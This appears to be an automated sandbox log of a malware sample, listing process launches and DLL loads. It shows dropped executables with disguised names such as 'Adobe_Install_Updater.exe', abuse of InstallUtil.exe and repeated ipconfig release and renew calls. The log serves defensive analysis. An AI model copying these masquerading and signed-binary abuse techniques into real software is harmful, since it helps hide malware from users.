Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe "C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: unknown Process created: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe "C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe "C:\Users\user\AppData\Local\Temp\Plain_Checker.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\build.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: unknown Process created: C:\Users\user\AppData\Roaming\Yftssfzf.exe "C:\Users\user\AppData\Roaming\Yftssfzf.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: unknown Process created: C:\Users\user\AppData\Roaming\Yftssfzf.exe "C:\Users\user\AppData\Roaming\Yftssfzf.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe "C:\Users\user\AppData\Local\Temp\Plain_Checker.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\Plain_Checker.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Roaming\Yftssfzf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\6RE1Z857ae.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe_Install_Updater.exe Section loaded: windows.storage.dll
